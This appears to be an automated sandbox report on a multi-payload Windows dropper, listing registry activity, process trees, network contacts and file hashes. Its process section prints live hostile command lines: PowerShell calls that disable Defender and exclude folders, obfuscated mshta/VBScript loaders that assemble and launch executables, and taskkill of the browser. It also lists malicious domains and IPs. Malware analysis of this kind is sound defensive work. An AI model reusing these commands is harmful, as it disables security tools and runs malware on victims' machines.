| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe
Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe
Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe
Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe
Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe
Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe
Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe
Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe
Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe
Tue19c06f159e0ec.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe
Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe
Tue19c78ded4d176ac.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe
Tue19b4ef3b53293fe.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe
Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe"
C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp" /SL5="$C0156,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp" /SL5="$40206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 488
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue193858933525b62.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| N/A | 127.0.0.1:49318 | tcp | |
| N/A | 127.0.0.1:49320 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 72.84.118.132:8080 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
| MD5 | ba794724c566766d57e2aee175cde54a |
| SHA1 | 401fb41eaf42791c66738f460009ba00f7cdd913 |
| SHA256 | 9a6c446576e8005dae5b5fb4df7876dea6f09501156e9a5220b60d77b41566d6 |
| SHA512 | 590777c06b912054ef8722c8195521e1c74bf3f31f7c3b8e9e2b7a14352f25ed0ada8e6751916017bd506af03eb0afea0ca759872a8ff17d5837836fdaf6e774 |
memory/1864-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zSC6A42827\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/1864-75-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-81-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe
| MD5 | 26278caf1df5ef5ea045185380a1d7c9 |
| SHA1 | df16e31d1dd45dc4440ec7052de2fc026071286c |
| SHA256 | d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5 |
| SHA512 | 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O4ME655FRBIHVU8GHA65.temp
| MD5 | b9e77e0f9f67e51b998d217d75b67fb6 |
| SHA1 | 89b32401fc5be2391a57a4770d7ddf8419de6633 |
| SHA256 | 2a060ef2c0daa42d63bf58ec43e23a02deae6310298f7614944249a0da87b60b |
| SHA512 | 7e4c834afbbb5853baf3bb17c82906341aeaab205baf38d3827554e907b3cf595591e3eb793a77e69cd59983e12a9ac3a87da27306e90100fd50600668bc6f08 |
memory/2212-139-0x00000000012D0000-0x0000000001342000-memory.dmp
memory/596-144-0x0000000000BB0000-0x0000000000BB8000-memory.dmp
memory/3012-171-0x00000000004F0000-0x00000000004F6000-memory.dmp
memory/1876-193-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2228-194-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2396-197-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\is-CBB09.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
C:\Users\Admin\AppData\Local\Temp\is-CBB09.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2392-142-0x0000000000A80000-0x0000000000AF0000-memory.dmp
memory/3012-140-0x0000000000B20000-0x0000000000B38000-memory.dmp
